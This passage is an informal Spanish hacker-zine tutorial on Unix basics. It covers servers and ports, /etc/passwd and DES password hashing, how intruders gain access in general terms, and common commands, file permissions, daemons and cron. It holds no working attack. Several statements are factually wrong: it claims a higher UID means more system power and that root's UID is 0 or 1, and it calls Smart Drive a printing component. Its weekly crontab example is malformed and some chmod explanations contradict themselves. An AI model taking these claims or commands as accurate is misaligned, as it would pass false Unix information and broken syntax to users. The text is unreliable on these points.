realizar varias tareas a la vez, un ejemplo de sistema es el de una pagina web,
puesto que la computadora en que esta guardada la pagina tiene la capacidad de
atender a  varios usuarios que  soliciten esa misma  pagina (Si tu vecino esta
viendo  una pagina,  tu la  puedes ver en otra PC al mismo tiempo, el servidor
atiende a los dos llamados al mismo tiempo.)

Las tareas un sistema (servidor) estan  divididas por puertos. Por ejemplo
el  puerto 25  se dedica exclusivamente  a enviar  mail, esto es comparable al
puerto  de  impresion  de  tu  PC (LTP1)  solo  que  en el caso de servidores,
generalmente son porgramas (software) y no hardware como la Smart Drive que se
encarga de imprimir en tu PC.

Las personas  que tienen  acceso permitido a un sistema se denominan usuarios,
la manera  de como un servidor reconoce quien tiene y quien no tiene permitido
la  entrada a  el,  es mediante  la combinacion de dos palabras, el LOGIN y la
CONTRASENA, esta informacion  en las maquinas con Unix/Linux es guardada en el
archivo /etc/passwd generalmente, aunque varia de version a version.

El hacker  puede  entrar a  un sistema basicamente de dos formas, la primera a
partir  de  una  combinacion  valida  de  LOGIN  y  PASSWDORD  y  la  segunada
aprovechando  errores del  sistema  operativo o configuracion y ganando acceso
sin tener que obtener un LOGIN y PASSWORD.

Hasta  aqui pareceria  facil entrar a algun sistema, pues si conoces a alguien
de ese  sistema le podrias  decir que te mandara el archivo passwd, para tener
todos los logins y passwds, pero no es asi por que el sistema de archivos esta
protegido con el sistema de encripcion DES, este consiste en que el passwd que
se  le asigna  a un  usuario se  encrypta  con  este  sistema,  y  la  palabra
resultante se le encrypta otras 25 veces con este mismo sistema y a la palabra
resultante  y  a  la  palabra  resultante  (mas bien signos) se le agregan dos
caracteres  mas dependiendo  de  la fecha  y  la hora, asi que este proceso es
irreversible (ONE-WAY ENCRYPTION ) asi  que cuando los usuarios dan su login y
password, para entrar a un sistema, este no desencripta la palabra del archivo
passwd, sino  que la palabra  dada por el usuario la encripta y la compara con
la archivada.

Por  ultimo los  usuarios de  un servidor  esta organizados  por grupos (grupo
financiero,  estudiantes, jardineros,  etc), en  un sistema  multiusuario esta
claro que debe haber cierta privacidad  (si yo hago un doc, no me gustaria que
todos  lo vieran),  los usuarios  a su vez se organizan individualmente por su
UID  y por  grupos con  la GID  mientras este  numero sea mayor, mayor sera su
poder en el sistema. Asi el usuario Root (Super ususraio) tendra uid 0 o 1.
UID=User ID
GID=Group ID    

#########################################################################
### Comandos Basicos de Unix {{{{{{{{-------}}}}}}}} por ^[]xt0ne[]^ ###
#########################################################################

Un  sistema operativo  es un  programa ke  se encarga de manejar el hardware y
software  del  PC  a  beneficio  del  usuario.  Los sistemas operativos fueron
dise�ados para realizar tareas de hardware repetitivas etc etc etc, creo ke ya
han  oido mucho de eso pero keria empezar asi =) de lo ke si les hablare antes
es  de  ke  es  unix  y algo de su historia, sera breve. La historia empieza a
finales  de los  70,  momento en  ke  tuvo  lugar  un proyecto concertado para
desarrollar  nuevas  tecnicas  de  sistemas  operativos.  En  1968 un grupo de
investigadores  de General Electric, AT&T Bell y del Instituto Tecnologico  de
Masachussets,  realizo  un  proyecto  especial  de  investigacion  de sistemas
operativos  llamado  Multics,  Multics  incorporo  muchos  conceptos nuevos de
multitarea.  En 1969,  Ken  Thompson  de AT&T Bell Laboratories, desarrollo el
sistema  operativo Unix,  incluyendo  en el  muchas de las caracteristicas del
proyecto   de  investigacion   Multics,  Thompson  adapto  el  sistema  a  las
nesecidades  de  un  entorno  de  investigacion dise�andolo para ke se pudiera
ejecutar en minicomputadoras.
Bueno hay mas de esa historia pero seria muy tedioso relatarla ademas de ke lo
ke  nos interesa  ahora mismo es conocer algunos comandos basicos de Unix, asi
ke aca estan los mas importantes:


#########################Opciones y argumentos##########################

Una  opcion es  un  codigo consistente  en una letra precedida por un guion ke
modifica la accion ke efectuara la orden

ej: ls -l

ls  visualiza todos  los  archivos ke hay en el directorio actual la opcion -l
modificara  su tarea y  mostrara un linea  de informacion de cada archivo como
son  el tama�o y la fecha y hora en ke fue por ultima vez modificado ademas de
los permisos ke este tiene.

Estos son otros argumentos ke se pueden utilizar con ls:
-a presenta una lista de los archivos de un directorio incluyendo los archivos
   ocultos.
-F muestra  los nombres de directorios precedidos por una barra para una mejor
   identificacion de estos.
-R lista el directorio actual con sus subdirectorios

Se pueden hacer combinaciones ls -al etc....


#######################Comandos comunes ########################

($ o # definen ke tipo de usuario eres si es $ tu status es de usuario si es #
eres superusuario o root)

ls : lista archivos
ej = $ ls nombre_archivo

cp : copia archivos
ej = $ cp nombre_archivo /home/user (donde /home/user son el directorio y
subdirectorio respectivamente )
( en el cual sera copiado el archivo )
rm : borra archivos
ej = $ rm nombre_archivo

mv : sirve para mover o renombrar archivos
ej = $mv nombre_archivo /home/user (eso en caso de mover el archivo a el
directorio rekerido)
ej = $mv nombre_archivo 2nombre_archivo (esto en caso de kerer renombrar el
archivo)

cd : igual ke en DOS permite acceder a un directorio
ej = $ cd nombre_directorio

mkdir : crea un directorio
ej = $mkdir nombre_directorio

rmdir : elimina un directorio
ej = $rmdir nombre_directorio

cat : filtro utilizado para mostrar el contenido de archivos
ej = $cat /home/user/nombre_archivo

more : visualiza un archivo pantalla por pantalla
ej = $more nombre_archivo

pwd : presenta el nombre de via completo del directorio en ke te encuentras
ej = $ pwd
/home/user
$_

find : permite efectuar una buskeda de archivos
ej = $ find nombre_archivo (esto busca el archivo en el directorio actual)
ej = $ find nombre_archivo / (buscar el archivo en todo el disco duro)


#################Operaciones de administracion de archivos ################

Unix  proporciona  varias  utilidades  para  el  manejo  de  sus   archivos  y
directorios, tambien puede controlar el acceso a sus archivos, cada archivo de
unix tiene  definido una serie de permisos ke determinan kienes tiene acceso a
el, asi como el tipo de acceso ke puedan tener.

Como ya dijimos antes ls -l nos permita visualizar los permisos de determinado
archivo o directorio con el comando chmod podemos modificar esos permisos.

ej = $ ls -l datos
-rw-r--r-x 1 juan wheater 207 Feb 15 11:30 datos
|| | | | | |
|| | | | | |
tipo |de archivo | | nombre del ar|chivo en b|ytes
| | | | |
permisos nombre de| due�o | nombre del archivo
| fecha y hora de la ultima actualizacion
nombre del grupo

En  ese ejemplo  vemos  los  datos  de un archivo en caso de ke datos fuera un
directorio su tipo seria d y se veria drw-r--r-x.
Los  permisos se dividen como ya vimos en 10 casillas de las cuales la primera
indica  si es  un archivo o  si es un directorio las tres siguiente ekivalen a
los permisos del due�o del archivo o directorio las tres ke siguen equivalen a
los permisos del grupo y las tres ultimas a los permisos de los demas usuarios
Asi estan distribuidos los permisos :
del due�o del grupo de otros rwx rwx rwx rw- rw- r--

donde r equivale al permiso de lectura
w permiso de escritura
x permiso de ejecucion


Estos  permisos pueden ser modificados utilizando la orden chmod , para su uso
se  han especificado  las categorias  de cada usuarios asi: u para el due�o, g
para el grupo y o para otros usuarios.
ej = $chmod g+rw datos (esto  le a�ade permisos de escritura y lectura a datos
para el grupo)
ej = $chmod o-x datos (en este caso se le kita el permiso de ejecucion a los
otros usuarios del archivo datos)
ej = $chmod u+r-wx (aqui se le da permiso de lectura al due�o pero de igual
modo se le kitan los permisos de lectura y escritura)
ej = $chmod a+r (este le da permiso de lectura a todos tanto a el due�o como
al grupo y a los demas usuarios)
ej = $chmod +r (hace lo mismo ke la anterior le da el permiso de lectura a
todos)

Como  ves  se  puede  jugar  con los permisos es simplemente cuestion de hacer
combinaciones y  usar la imaginacion, se pueden tambien modificar los permisos
de un directorio simplemente se especifica al final el nombre del directorio.


Bueno  por ahora  la  dejo alli mas adelante se profundisara con los permisos,
hablando de los permisos absolutos.

~~~~~~~~~~~~~~~~~~~
DAEMONS Y DRAGONES
~~~~~~~~~~~~~~~~~~~

Los  demonios  son  procesos  que  no  estan  conectados a un terminal; pueden
ejecutarse en modo subordinado y realizan trabajo util.

El integrador  de impresion es un ejemplo de DAEMON, es decir, un programa que
se  ejecuta en  el plano  secundario y  que proporciona un servicio de interes
general. Unix  posee cierto  numero de programas de este tipo. Algunos daemons
arrancan de  manera automatica cuando alguien inicializa el sistema, y siempre
estan  disponibles. Otros  permanecen  inactivos  la  mayor  parte del tiempo,
despertando a intervalos predefinidos o en respuesta a algun SUCESO.

Los daemons  ejecutan todo  tipo de funciones para lograr que el sistema opere
optimamente: manejan la memoria, controlan los trabajos de impresion, envian y
reciben  correo,  ejecutan  comandos  en  tiempos  especificos,   responden  a
peticiones remotas con finger, etcetera.

El  daemon integrador  de  la  impresion  se llama lpd. El daemon de finger se
llama fingerd. El daemon mas comun es sendmail.

Las  comunicaciones del  sistema  UNIX  a  traves  de  uucp  implican a varios
demonios:  uucico  maneja  la  planificacion  y administracion de los trabajos
uucp,  comprobando si  existe  algun trabajo  para  ejecutar, seleccionando un
dispositivo,  estableciendo la conexion,  ejecutando el trabajo y actualizando
el archivo  de  registro; uuxqt  controla  la  ejecucion  remota  de  ordenes.
Demonios  similares  manejan  la  impresion  y  el funcionamiento del spool de
impresora,  la  copia  de  seguridad  de  archivos. la limpieza de directorios
temporales  y  las operaciones de facturacion. Cada uno de estos demonios esta
controlado por cron, que es asimismo ejecutado por init (PID 1).
*--------------------------------------------------------------------------*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Que significa ... Daemons, dragones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Aunque  el  nombre  se  pronuncia 'dii-mon', la forma correcta de escritura es
daemon. No  se sabe  si el ser un acronimo o por que existe una variante de su
escritura en Inglaterra. (En la mitologia Celta, un daemon es, por lo general,
un espiritu  o inspiracion, bueno o neutral. Sin embargo, un Demon [demonio en
espa�ol] siempre es una entidad maligna.)

Tal  vez usted lea en alguna parte que el nombre significa "monitor de disco y
ejecucion"  (Disk and  Executing Monitor), termino  derivado  de  las antiguas
computadoras DEC  10 y 20. Sin embargo esta explicacion se formulo despues del
hecho.

Los  programadores   del   MIT (Massachusetts  Institute  of  Technology)  que
trabajaron en CTSS (Sistema Compatible de Tiempo Compartido, El CTSS tenia una
libreria llamada "runcom"", que ejecutaba una lista de comandos almacenados en
un  archivo), desarrollado  en  1963  usaron  primero  el  nombre  Daemon. Los
acu�aron  para  lo  que otros programadores denominaron DRAGONES (cabe se�alar
que estos trabajaban en el ITS [Sistema Incompatible de Tiempo Compartido]).

CTSS  e  ITS  son  ancestros de Unix. ITS fue un sistema operativo importante,
aunque extra�o, con un sequito de adoradores en el MIT. Hoy en dia, ITS aun es
reverenciado entre hackers ancestrales de la Costa Este de Estados Unidos.

En  terminos precisos,  un dragon es un daemon que no se invoca explicitamente
pero  esta ahi, esperando  en el plano secundario para ejecutar un trabajo. El
daemon por ejemplo, podria considerarse un dragon.
*---------------------------------------------------------------------------*
~~~~~~~~~~~~~~~~
El demonio Cron
~~~~~~~~~~~~~~~~

Cron es un demonio de sistema que ejecuta ordenes en instantes especificos. La
informacion de ordenes y de planificacion estan mantenidas en el directorio:
   /var/spool/cron/crontabs en SVR4,
o en
   /usr/spool/cron/crontabs en los sistemas anteriores a SVR4.

Cada  usuario que  esta titulado para planificar directamente ordenes con cron
tiene un  archivo crontab. cron despierta periodicamente (generalmente una vez
cada minuto) y ejecuta los trabajos que estan planificados para ese minuto.

Las entradas en un archivo crontab tienen seis campos:

El primer campo es el minuto en que la orden va a ejecutarse.
El segundo campo es la hora.
El tercero, el dia del mes.
El cuarto, el mes del a�o.
el quinto, el dia de la semana.
y el sexto, la cadena de orden a ejecutar.
Los asteriscos actuan como comodines.
En el ejemplo crontab se ejecuta el programa con nombre de camino
/var/cron/log y se envia por correo a "root" todos los
dias a las 8 P.M. El programa /home/john/bin/backup se ejecuta todos los
dias a las 2:30 A.M.

#
#
# MIN      HOUR      DCM       MOY       DOW      COMMAND
#
# (0-59)   (0-23)    (1-31)    (1-12)    (0-6)    (Note: 0=Sun)
# ------   -------   -------   -------   ------   --------------
#
0          18        *         *         *        /var/cron/log mail root
30         2         *         *         *        /home/john/bin/backup


El archivo/etc/cron.d/cron.allow  contiene la lista  de todos los usuarios que
tienen  permitido realizar  entradas en la crontab. Si se es administrador del
sistema,  o si  este  es su propio sistema, se tendra capacidad para modificar
los archivos  crontab. Si no  se tiene permitido modificar un archivo crontab,
se puede usar la orden at para planificar los trabajos.

~~~~~~~~~~~~~~~~
La orden crontab
~~~~~~~~~~~~~~~~

Para  a�adir  algo  al  archivo  crontab,  se puede usar la orden crontab. Por
ejemplo,  puede planificarse  la supresion de archivos antiguos en la papelera
con una entrada como esta:
  0 1 0 cd/home/john/wastebasket; find . -atime+7 -exec /bin/rm-r { } 2>
  /dev/null;

Traduccion : cada  domingo a la 1 A.M., ir al directorio wastebasket de john y
suprimir todos los archivos que tengan una antiguedad de mas de siete dias. Si
se coloca esta linea en un archivo de nombre viejos y se ejecuta la orden:
  $crontab viejos

la  linea se colocara en el archivo crontab. Si se usa crontab sin especificar
un archivo,  la entrada estandar sera la que se coloque en el archivo crontab.
La orden:
  $ crontab
  CTRL - D

borra  los contenidos  de  crontab,  es  decir,  reemplaza  los contenidos con
nada :).

En resumen los daemons son programas residentes en memoria, ademas nadie es el
due�o y pueden ser lanzados por el sistema o por un usuarios permitidos.

John Jairo